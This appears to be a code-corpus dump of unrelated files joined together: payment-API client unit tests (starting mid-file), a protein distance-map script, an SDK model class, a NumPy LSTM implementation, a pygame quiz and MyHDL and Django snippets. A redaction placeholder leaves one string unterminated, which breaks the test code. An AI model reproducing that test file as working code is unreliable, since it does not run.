self.assertEqual(
TransfersList(
transfers=[
Transfer(
transfer_id='11',
sender_user_id=22,
receiver_user_id=33,
amount=1000000,
reference_id='REF-ID-111',
created_at=datetime(2021, 2, 1)
),
Transfer(
transfer_id='44',
sender_user_id=55,
receiver_user_id=66,
amount=2000000,
reference_id='REF-ID-222',
created_at=datetime(2021, 2, 1)
)
],
next_page_token='gh<PASSWORD>'
),
self.client.cash.list_transfers(
['REF-ID-111', 'REF-ID-222'],
start_date=datetime(2021, 2, 1),
end_date=datetime(2021, 4, 3),
page_token='abcdef'
)
)
def test_create_va_topup(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '7LtJU4UaR9yUuNzbLww1sYyMEM14ctQCnfp4bTp4++A='
},
text=json.dumps({
'channels': [{
'fee': '5000',
'channel_id': 31,
'pay_code': 'abcdef',
'amount': 1000000,
'total': 1005000
}],
'topup_id': '456',
'expires_at': '1612137600'
})
)
self.assertEqual(
Topup(
channels=[
Channel(
fee=5000,
channel_id=31,
pay_code='abcdef',
amount=1000000,
total=1005000
)
],
topup_id='456',
expires_at=datetime(2021, 2, 1)
),
self.client.cash.create_va_topup(1000000, 123)
)
def test_create_va_topup_failed_minimum_amount(self):
self._create_failed_create_va_topup(
InputValidationError, 10001, 'The amount must be at least 10000'
)
def test_create_va_topup_failed_maximum_amount(self):
self._create_failed_create_va_topup(
InputValidationError, 10001, 'The amount may not be greater than 1000000000000'
)
def test_create_va_topup_failed_sub_user_does_not_exists(self):
self._create_failed_create_va_topup(GeneralError, 10000, 'User not found')
def test_create_va_topup_failed_theres_already_topup_request(self):
self._create_failed_create_va_topup(GeneralError, 10000, 'Pending topup exists')
def _create_failed_create_va_topup(self, error, error_code, message):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '7LtJU4UaR9yUuNzbLww1sYyMEM14ctQCnfp4bTp4++A='
},
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': error_code
})
)
with self.assertRaises(error) as ctx:
self.client.cash.create_va_topup(1000000, 123)
self.assertEqual(str(ctx.exception), message)
def test_find_active_va_topup(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/active',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '9JcNSUOjeLKP0ENLp671MTl4rYBX55iEtg6Q/V0dNo0='
},
text=json.dumps({
'channels': [{
'fee': '5000',
'channel_id': 31,
'pay_code': 'abcdef',
'amount': 1000000,
'total': 1005000
}],
'topup_id': '456',
'expires_at': '1612137600'
})
)
self.assertEqual(
Topup(
channels=[
Channel(
fee=5000,
channel_id=31,
pay_code='abcdef',
amount=1000000,
total=1005000
)
],
topup_id='456',
expires_at=datetime(2021, 2, 1)
),
self.client.cash.find_active_va_topup()
)
def test_find_active_va_topup_with_user_id_parameter(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/active',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'rdg9EpRwjKbHPRwos6L1clPGP15w6zHTUOUM+4uUk3A='
},
text=json.dumps({
'channels': [{
'fee': '5000',
'channel_id': 31,
'pay_code': 'abcdef',
'amount': 1000000,
'total': 1005000
}],
'topup_id': '456',
'expires_at': '1612137600'
})
)
self.assertEqual(
Topup(
channels=[
Channel(
fee=5000,
channel_id=31,
pay_code='abcdef',
amount=1000000,
total=1005000
)
],
topup_id='456',
expires_at=datetime(2021, 2, 1)
),
self.client.cash.find_active_va_topup(123)
)
def test_find_active_va_topup_failed_no_active_topup_order(self):
message = 'Order not found'
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/active',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'rdg9EpRwjKbHPRwos6L1clPGP15w6zHTUOUM+4uUk3A='
},
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': 10000
})
)
with self.assertRaises(GeneralError) as ctx:
self.client.cash.find_active_va_topup(123)
self.assertEqual(str(ctx.exception), message)
def test_cancel_va_topup(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/cancel',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'Xx6lyK8XK7FJmwzQPVLngIMFUaIq4e+cYyue/nw/ET8='
},
text=json.dumps({})
)
self.assertEqual({}, self.client.cash.cancel_va_topup())
def test_cancel_va_topup_with_user_id_parameter(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/cancel',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'D1TXjaSBB5x+sCyzHgqz+hdXK0nu4fN6ClnZsRQYTPE='
},
text=json.dumps({})
)
self.assertEqual({}, self.client.cash.cancel_va_topup(123))
def test_cancel_va_topup_failed_no_active_topup_order(self):
self._create_failed_cancel_va_topup(GeneralError, 10000, 'Order not found')
def test_cancel_va_topup_failed_sub_user_does_not_exists(self):
self._create_failed_cancel_va_topup(GeneralError, 10000, 'User not found')
def test_cancel_va_topup_failed_not_the_order_owner(self):
self._create_failed_cancel_va_topup(
GeneralError, 10000, "You don't have credential to access this data."
)
def test_cancel_va_topup_failed_order_already_confirmed(self):
self._create_failed_cancel_va_topup(GeneralError, 10000, "Can't cancel this order.")
def _create_failed_cancel_va_topup(self, error, error_code, message):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/cancel',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'D1TXjaSBB5x+sCyzHgqz+hdXK0nu4fN6ClnZsRQYTPE='
},
status_code=400,
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': error_code
})
)
with self.assertRaises(error) as ctx:
self.client.cash.cancel_va_topup(123)
self.assertEqual(str(ctx.exception), message)
def test_get_balance(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/me/balance',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'ms3Xm918ZnQ8rayEjAvnV86uKTxQLqFv/7M6F+SJ1kk='
},
text=json.dumps({
'cash': {
'amount': 1000000,
'currency': 'IDR',
'formatted_amount': 'Rp1,000,000'
},
'locked_cash': {
'amount': 100000,
'currency': 'IDR',
'formatted_amount': 'Rp100,000'
}
})
)
self.assertEqual(
Balance(
cash=Cash(1000000, 'IDR', 'Rp1,000,000'),
locked_cash=Cash(100000, 'IDR', 'Rp100,000')
),
self.client.cash.get_balance()
)
def test_get_balance_with_user_id_parameter(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/123/balance',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '8ek7fHgiGmYXUDRO/7ygi2enSnxrAwEvEUDo13AJQJ8='
},
text=json.dumps({
'cash': {
'amount': 1000000,
'currency': 'IDR',
'formatted_amount': 'Rp1,000,000'
},
'locked_cash': {
'amount': 100000,
'currency': 'IDR',
'formatted_amount': 'Rp100,000'
}
})
)
self.assertEqual(
Balance(
cash=Cash(1000000, 'IDR', 'Rp1,000,000'),
locked_cash=Cash(100000, 'IDR', 'Rp100,000')
),
self.client.cash.get_balance(123)
)
def test_get_balance_failed_user_does_not_exists(self):
message = ''
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/123/balance',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '8ek7fHgiGmYXUDRO/7ygi2enSnxrAwEvEUDo13AJQJ8='
},
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': 10000
})
)
with self.assertRaises(GeneralError) as ctx:
self.client.cash.get_balance(123)
self.assertEqual(str(ctx.exception), message)
def test_get_transactions_history(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transactions',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'mDAKk7c//3X7r4X6Q/G0EtlY0fq0Ix7xQG2Gn4oI/A4='
},
text=json.dumps({
'cash_transactions': [{
'cash_transaction_id': '123',
'user_id': '456',
'amount': 1000000,
'balance_before': 1000000,
'balance_after': 2000000,
'transaction_type': 'api_disbursement',
'created_at': '1612137600'
}],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransactionsHistory(
cash_transactions=[
CashTransaction(
cash_transaction_id='123',
user_id='456',
amount=1000000,
balance_before=1000000,
balance_after=2000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 2, 1)
)
],
next_page_token='abcdef'
),
self.client.cash.get_transactions_history()
)
def test_get_transactions_history_with_parameters(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transactions',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'cONLC0e0B/lAd7k0NV3TP7gOHTAAR5O5VzX7O8hUf5k='
},
text=json.dumps({
'cash_transactions': [{
'cash_transaction_id': '123',
'user_id': '456',
'amount': 1000000,
'balance_before': 1000000,
'balance_after': 2000000,
'transaction_type': 'api_disbursement',
'created_at': '1612137600'
}],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransactionsHistory(
cash_transactions=[
CashTransaction(
cash_transaction_id='123',
user_id='456',
amount=1000000,
balance_before=1000000,
balance_after=2000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 2, 1)
)
],
next_page_token='abcdef'
),
self.client.cash.get_transactions_history(
start_date=datetime(2021, 2, 1),
end_date=datetime(2021, 4, 3),
page_token='ghijkl'
)
)
def test_get_sub_user_transactions_history(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/sub-user-transactions',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '<KEY>
},
text=json.dumps({
'cash_transactions': [
{
'cash_transaction_id': '111',
'user_id': '456',
'amount': 1000000,
'balance_before': 1000000,
'balance_after': 2000000,
'transaction_type': 'api_disbursement',
'created_at': '1612137600'
},
{
'cash_transaction_id': '222',
'user_id': '789',
'amount': 3000000,
'balance_before': 3000000,
'balance_after': 4000000,
'transaction_type': 'api_disbursement',
'created_at': '1617408000'
}
],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransactionsHistory(
cash_transactions=[
CashTransaction(
cash_transaction_id='111',
user_id='456',
amount=1000000,
balance_before=1000000,
balance_after=2000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 2, 1)
),
CashTransaction(
cash_transaction_id='222',
user_id='789',
amount=3000000,
balance_before=3000000,
balance_after=4000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 4, 3)
)
],
next_page_token='abcdef'
),
self.client.cash.get_transactions_history([456, 789])
)
def test_get_sub_user_transactions_history_with_parameters(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/sub-user-transactions',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'kFIBW9qN5Z3IKUR1blmXIwxgdluIPLffCw3Kz5sWSKU='
},
text=json.dumps({
'cash_transactions': [
{
'cash_transaction_id': '111',
'user_id': '456',
'amount': 1000000,
'balance_before': 1000000,
'balance_after': 2000000,
'transaction_type': 'api_disbursement',
'created_at': '1612137600'
},
{
'cash_transaction_id': '222',
'user_id': '789',
'amount': 3000000,
'balance_before': 3000000,
'balance_after': 4000000,
'transaction_type': 'api_disbursement',
'created_at': '1617408000'
}
],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransactionsHistory(
cash_transactions=[
CashTransaction(
cash_transaction_id='111',
user_id='456',
amount=1000000,
balance_before=1000000,
balance_after=2000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 2, 1)
),
CashTransaction(
cash_transaction_id='222',
user_id='789',
amount=3000000,
balance_before=3000000,
balance_after=4000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 4, 3)
)
],
next_page_token='abcdef'
),
self.client.cash.get_transactions_history(
user_ids=[456, 789],
start_date=datetime(2021, 2, 1),
end_date=datetime(2021, 4, 3),
page_token='ghijkl'
)
)
if __name__ == '__main__':
unittest.main()
| 2.546875
| 3
|
scripts/python_lib/calpha_distance_map.py
|
sambitmishra0628/PSP-GNM
| 0
|
12782928
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 1 16:33:02 2018
@author: <NAME>
"""
# Calculate the distance map between the C-alpha atoms in a protein. The input
# file is required to be a C_alpha coordinate file
import sys
import re
import numpy as np
import matplotlib.pyplot as plt
def get_ca_coordinates (filename):
# parse the c-alpha coordinates from the PDB records
# pdb_records is a list of lines, each line corresponding to a line entry
# in a pdb file
fh = open(filename, 'r')
all_coords = []; # create a multi-dimensional array to store the coordinates
for line_i in fh:
if re.match('^\s*?$', line_i):
pass
elif re.match('^ATOM', line_i):
line_i = line_i.rstrip()
coords_i = line_i[26:54]
coords_i = coords_i.split() # split by white space into individual elements
# convert into integers
coords_i = list(map(float,coords_i)) # convert from string to numeric
all_coords.append(coords_i)
fh.close()
# convert the multi-dimensional array into numpy array
all_coords_ca = np.array(all_coords)
return all_coords_ca
def calculate_ca_dist(ca_coords):
# calculate c-alpha distances
nres = len(ca_coords)
dist_mat = np.zeros((nres,nres), dtype=float) # declare a 0 x 0 numpy matrix
# to store the values
for i in range(0,nres-1):
for j in range(i+1,nres):
diff_ij = ca_coords[i,:]-ca_coords[j,:];
r_ij = np.linalg.norm(diff_ij)
dist_mat[i,j] = r_ij
dist_mat[j,i] = r_ij
return dist_mat
# The main script which will invoke the functions
filename = sys.argv[1]
all_coords_ca = get_ca_coordinates(filename)
dist_mat = calculate_ca_dist(all_coords_ca)
plt.figure()
plt.imshow(dist_mat, cmap='jet')
plt.show()
| 3.296875
| 3
|
setup.py
|
MiltFra/discord-exchange
| 0
|
12782929
|
from setuptools import setup
setup(
name='discord-exchange',
version='0.0.1',
description='A Discord bot to trade on arbitrary quantities',
url='https://github.com/miltfra/discord-exchange',
author='<NAME>',
author_email='<EMAIL>',
license='Apache License 2.0',
packages=['discord_exchange'],
install_requires=[],
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache License 2.0',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
)
| 1.265625
| 1
|
huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/query_vmr_pkg_res_result_dto.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
| 1
|
12782930
|
# coding: utf-8
import pprint
import re
import six
class QueryVmrPkgResResultDTO:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'vmr_pkg_id': 'str',
'vmr_name': 'str',
'vmr_pkg_parties': 'int',
'vmr_pkg_count': 'int',
'vmr_pkg_used_count': 'int'
}
attribute_map = {
'vmr_pkg_id': 'vmrPkgId',
'vmr_name': 'vmrName',
'vmr_pkg_parties': 'vmrPkgParties',
'vmr_pkg_count': 'vmrPkgCount',
'vmr_pkg_used_count': 'vmrPkgUsedCount'
}
def __init__(self, vmr_pkg_id=None, vmr_name=None, vmr_pkg_parties=None, vmr_pkg_count=None, vmr_pkg_used_count=None):
"""QueryVmrPkgResResultDTO - a model defined in huaweicloud sdk"""
self._vmr_pkg_id = None
self._vmr_name = None
self._vmr_pkg_parties = None
self._vmr_pkg_count = None
self._vmr_pkg_used_count = None
self.discriminator = None
if vmr_pkg_id is not None:
self.vmr_pkg_id = vmr_pkg_id
if vmr_name is not None:
self.vmr_name = vmr_name
if vmr_pkg_parties is not None:
self.vmr_pkg_parties = vmr_pkg_parties
if vmr_pkg_count is not None:
self.vmr_pkg_count = vmr_pkg_count
if vmr_pkg_used_count is not None:
self.vmr_pkg_used_count = vmr_pkg_used_count
@property
def vmr_pkg_id(self):
"""Gets the vmr_pkg_id of this QueryVmrPkgResResultDTO.
云会议室套餐包id。
:return: The vmr_pkg_id of this QueryVmrPkgResResultDTO.
:rtype: str
"""
return self._vmr_pkg_id
@vmr_pkg_id.setter
def vmr_pkg_id(self, vmr_pkg_id):
"""Sets the vmr_pkg_id of this QueryVmrPkgResResultDTO.
云会议室套餐包id。
:param vmr_pkg_id: The vmr_pkg_id of this QueryVmrPkgResResultDTO.
:type: str
"""
self._vmr_pkg_id = vmr_pkg_id
@property
def vmr_name(self):
"""Gets the vmr_name of this QueryVmrPkgResResultDTO.
云会议室套餐包名称。
:return: The vmr_name of this QueryVmrPkgResResultDTO.
:rtype: str
"""
return self._vmr_name
@vmr_name.setter
def vmr_name(self, vmr_name):
"""Sets the vmr_name of this QueryVmrPkgResResultDTO.
云会议室套餐包名称。
:param vmr_name: The vmr_name of this QueryVmrPkgResResultDTO.
:type: str
"""
self._vmr_name = vmr_name
@property
def vmr_pkg_parties(self):
"""Gets the vmr_pkg_parties of this QueryVmrPkgResResultDTO.
云会议室套餐方数。
:return: The vmr_pkg_parties of this QueryVmrPkgResResultDTO.
:rtype: int
"""
return self._vmr_pkg_parties
@vmr_pkg_parties.setter
def vmr_pkg_parties(self, vmr_pkg_parties):
"""Sets the vmr_pkg_parties of this QueryVmrPkgResResultDTO.
云会议室套餐方数。
:param vmr_pkg_parties: The vmr_pkg_parties of this QueryVmrPkgResResultDTO.
:type: int
"""
self._vmr_pkg_parties = vmr_pkg_parties
@property
def vmr_pkg_count(self):
"""Gets the vmr_pkg_count of this QueryVmrPkgResResultDTO.
该云会议室套餐分配的总数。
:return: The vmr_pkg_count of this QueryVmrPkgResResultDTO.
:rtype: int
"""
return self._vmr_pkg_count
@vmr_pkg_count.setter
def vmr_pkg_count(self, vmr_pkg_count):
"""Sets the vmr_pkg_count of this QueryVmrPkgResResultDTO.
该云会议室套餐分配的总数。
:param vmr_pkg_count: The vmr_pkg_count of this QueryVmrPkgResResultDTO.
:type: int
"""
self._vmr_pkg_count = vmr_pkg_count
@property
def vmr_pkg_used_count(self):
"""Gets the vmr_pkg_used_count of this QueryVmrPkgResResultDTO.
该套餐对应的云会议室已分配数量。
:return: The vmr_pkg_used_count of this QueryVmrPkgResResultDTO.
:rtype: int
"""
return self._vmr_pkg_used_count
@vmr_pkg_used_count.setter
def vmr_pkg_used_count(self, vmr_pkg_used_count):
"""Sets the vmr_pkg_used_count of this QueryVmrPkgResResultDTO.
该套餐对应的云会议室已分配数量。
:param vmr_pkg_used_count: The vmr_pkg_used_count of this QueryVmrPkgResResultDTO.
:type: int
"""
self._vmr_pkg_used_count = vmr_pkg_used_count
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, QueryVmrPkgResResultDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 2.40625
| 2
|
test/dataloadertest.py
|
iseesaw/EAlib
| 4
|
12782931
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-09-22 00:54:06
# @Author : <NAME> (<EMAIL>)
# @Link : https://github.com/iseesaw
# @Version : $Id$
import os
from EAlib.utils.dataloader import BasicLoader
def BasicLoaderTest():
import os
dirpath = "D:\\ACourse\\2019Fall\\EvolutionaryComputation\\TSP\\tsp"
for file in os.listdir(dirpath):
if file[-4:] == ".tsp":
BasicLoader(os.path.join(dirpath, file)).load()
BasicLoaderTest()
| 2.046875
| 2
|
model.py
|
xinjli/tflstm2np
| 1
|
12782932
|
<filename>model.py
import numpy as np
def lstm_cell(input_tensor, prev_hidden_tensor, prev_cell_state, kernel, bias):
"""
forward inference logic of a lstm cell
reference: https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/lstm_ops.py
:param input_tensor: input tensor
:param prev_hidden_tensor: tensor of previous hidden state
:param kernel: weight
:param bias: bias
:return: hidden tensor, cell state tensor
"""
xh = np.concatenate([input_tensor, prev_hidden_tensor])
h = np.dot(xh, kernel)+bias
i, ci, f, o = np.split(h, 4)
# embed sigmoid to reduce function call
i = 1. / (1. + np.exp(-i))
f = 1. / (1. + np.exp(-f))
o = 1. / (1. + np.exp(-o))
ci = np.tanh(ci)
cs = np.multiply(ci, i) + np.multiply(prev_cell_state, f)
co = np.tanh(cs)
h = np.multiply(co, o)
return h, cs
def dynamic_rnn(input_tensors, kernel, bias):
"""
inference logic of an unidirectional lstm
:param input_tensors: a list of input tensor
:param kernel: weight
:param bias: bias
:return: hidden tensors, cell state tensors
"""
hidden_size = int(bias.shape[0]/4)
prev_hidden = np.zeros(hidden_size)
prev_cell_state = np.zeros(hidden_size)
hidden_lst = []
cell_state_lst = []
for input_tensor in input_tensors:
hidden, cell_state = lstm_cell(input_tensor, prev_hidden, prev_cell_state, kernel, bias)
hidden_lst.append(hidden)
cell_state_lst.append(cell_state)
prev_hidden = hidden
prev_cell_state = cell_state
return hidden_lst, cell_state_lst
def bidirectional_dynamic_rnn(input_tensors, forward_kernel, forward_bias, backward_kernel, backward_bias):
"""
inference logic of a bidirectional lstm
:param input_tensors: a list of input tensor
:param forward_kernel: kernel weight of forward cell
:param forward_bias: kernel bias of forward cell
:param backward_kernel: kernel weight of backward cell
:param backward_bias: kernel bias of backward cell
:return: forward_hidden, backward_hidden
"""
# reverse input tensors
inv_input_tensors = input_tensors[::-1]
# forward and backward
forward_hidden_lst, _ = dynamic_rnn(input_tensors, forward_kernel, forward_bias)
backward_hidden_lst, _ = dynamic_rnn(inv_input_tensors, backward_kernel, backward_bias)
# reverse backward hidden
backward_hidden_lst.reverse()
return np.array(forward_hidden_lst), np.array(backward_hidden_lst)
def stack_bidirectional_dynamic_rnn(inps, forward_kernel_lst, forward_bias_lst, backward_kernel_lst, backward_bias_lst):
"""
inference logic of a stack bidirectional lstm
:param input_tensors: a list of input tensor
:param forward_kernel_lst: kernel weight of forward cell for each layer
:param forward_bias_lst: kernel bias of forward cell for each layer
:param backward_kernel_lst: kernel weight of backward cell for each layer
:param backward_bias_lst: kernel bias of backward cell for each layer
:return: combined hiddens
"""
layer_size = len(forward_kernel_lst)
# check the number of layer is same
assert len(forward_bias_lst) == layer_size
assert len(backward_kernel_lst) == layer_size
assert len(backward_bias_lst) == layer_size
# the shape of first layer is different from other layers, run it separately
forward_hidden, backward_hidden = bidirectional_dynamic_rnn(inps, forward_kernel_lst[0], forward_bias_lst[0], backward_kernel_lst[0], backward_bias_lst[0])
for i in range(1, layer_size):
hiddens = np.concatenate([forward_hidden, backward_hidden], axis=1)
forward_hidden, backward_hidden = bidirectional_dynamic_rnn(hiddens, forward_kernel_lst[i], forward_bias_lst[i], backward_kernel_lst[i], backward_bias_lst[i])
return np.concatenate([forward_hidden, backward_hidden], axis=1)
| 3.1875
| 3
|
autogalaxy/pipeline/phase/dataset/__init__.py
|
jonathanfrawley/PyAutoGalaxy_copy
| 0
|
12782933
|
<gh_stars>0
from autogalaxy.pipeline.phase.dataset.analysis import Analysis
from autogalaxy.pipeline.phase.dataset.meta_dataset import MetaDataset
from autogalaxy.pipeline.phase.dataset.result import Result
from .phase import PhaseDataset
| 1.078125
| 1
|
game.py
|
projeto-de-algoritmos/Trabalho_1_Graph_game
| 0
|
12782934
|
<filename>game.py
import pygame
import math
from pygame.locals import *
from screens import Menu
from screens import Question
from screens import Answer
from screens import Info
from screens import CreateLevel
from screens import Finish
from screens import SelectTam
class Game:
# Game constants
WIDTH = 1024
HEIGHT = 768
GAME_NAME = '<NAME>'
INTRO_TEXT = 'Identifique\n os grafos bipartidos'
#Question state
CORRECT_ANSWER = 1
WRONG_ANSWER = 2
TIMES_UP = 3
# Game mods
STANDARD = 1
CUSTOM = 2
running = True
current_question = 0
max_questions = 0
game_mode = STANDARD
corrects_ans = 0
wrong_ans = 0
current_graph = None
current_screen = Menu.ID
state_question = CORRECT_ANSWER
graphs = []
standard_graphs = []
custom_graphs = []
def __init__(self):
self.screen = pygame.display.set_mode((self.WIDTH, self.HEIGHT))
self.menu_screen = Menu(self)
self.question_screen = Question(self)
self.answer_screen = Answer(self)
pygame.display.set_caption(self.GAME_NAME)
icon = pygame.image.load('icon.png')
pygame.display.set_icon(icon)
self.screens = []
self.add_screen(Menu)
self.add_screen(Question)
self.add_screen(Answer)
self.add_screen(Info)
self.add_screen(CreateLevel)
self.add_screen(Finish)
self.add_screen(SelectTam)
self.clock = pygame.time.Clock()
def add_screen(self, Screen):
self.screens.append(Screen(self))
def select_tam(self, tam):
for screen in self.screens:
if screen.ID == CreateLevel.ID:
screen.set_tam(tam)
self.change_screen(CreateLevel)
return
def run(self, graphs=[]):
pygame.init()
self.standard_graphs = graphs
self.max_questions = len(graphs)
while self.running:
for screen in self.screens:
if self.current_screen==screen.ID:
screen.run()
def start_game(self, game_mode=STANDARD):
self.current_question = 0
self.wrong_ans = 0
self.corrects_ans = 0
if game_mode == self.CUSTOM:
self.graphs = self.custom_graphs
else:
self.graphs = self.standard_graphs
self.max_questions = len(self.graphs)
self.change_screen(Question)
def quit_game(self):
self.running = False
def change_screen(self, screen):
self.current_screen = screen.ID
def answer_question(self, ans):
if self.current_graph.bipartite() == ans:
self.corrects_ans+=1
self.state_question = self.CORRECT_ANSWER
else:
self.wrong_ans+=1
self.state_question = self.WRONG_ANSWER
self.change_screen(Answer)
def no_answer_question(self):
self.current_graph.bipartite()
self.state_question = self.TIMES_UP
self.change_screen(Answer)
def next_question(self):
self.current_question = self.current_question+1
if self.current_question>=self.max_questions:
self.current_question = 0
self.change_screen(Finish)
else:
self.change_screen(Question)
| 3.21875
| 3
|
test/test_cores/test_video/mm_lt24lcdsys.py
|
meetps/rhea
| 1
|
12782935
|
<reponame>meetps/rhea<gh_stars>1-10
import myhdl
from myhdl import Signal, intbv
from rhea.system import Global, Clock, Reset
from rhea.cores.video import VideoMemory
from rhea.cores.video import color_bars
from rhea.cores.video.lcd import LT24Interface
from rhea.cores.video.lcd import lt24lcd
from rhea.cores.misc import glbl_timer_ticks
from rhea.utils.test import tb_move_generated_files
def mm_lt24lcdsys(clock, reset,
lcd_on, lcd_resetn, lcd_csn, lcd_rs,
lcd_wrn, lcd_rdn, lcd_data):
"""
"""
# interfaces
glbl = Global(clock, reset)
lcd = LT24Interface()
resolution = lcd.resolution
color_depth = lcd.color_depth
refresh_rate = 60
vmem = VideoMemory(resolution=resolution, color_depth=color_depth)
# assign the ports to the interface
lcd.assign(lcd_on, lcd_resetn, lcd_csn, lcd_rs, lcd_wrn,
lcd_rdn, lcd_data)
# simulation mode, reduce the dead time between real-world ticks
# modules
gtck = glbl_timer_ticks(glbl, user_timer=16, tick_div=100)
gbar = color_bars(glbl, vmem, resolution=resolution,
color_depth=color_depth)
glcd = lt24lcd(glbl, vmem, lcd)
return gtck, gbar, glcd
def convert():
clock = Clock(0, frequency=50e6)
reset = Reset(0, active=0, async=True)
lcd_on = Signal(bool(0))
lcd_resetn = Signal(bool(0))
lcd_csn = Signal(bool(0))
lcd_rs = Signal(bool(0))
lcd_wrn = Signal(bool(0))
lcd_rdn = Signal(bool(0))
lcd_data = Signal(intbv(0)[16:])
myhdl.toVerilog.directory = 'output'
myhdl.toVerilog(mm_lt24lcdsys, clock, reset,
lcd_on, lcd_resetn, lcd_csn, lcd_rs,
lcd_wrn, lcd_rdn, lcd_data)
myhdl.toVHDL.directory = 'output'
myhdl.toVHDL(mm_lt24lcdsys, clock, reset,
lcd_on, lcd_resetn, lcd_csn, lcd_rs,
lcd_wrn, lcd_rdn, lcd_data)
tb_move_generated_files()
| 2.015625
| 2
|
urls.py
|
0x0mar/PyDetector
| 1
|
12782936
|
from django.conf.urls import patterns, include, url
from pydetector.views import hello
from pydetector.views2 import *
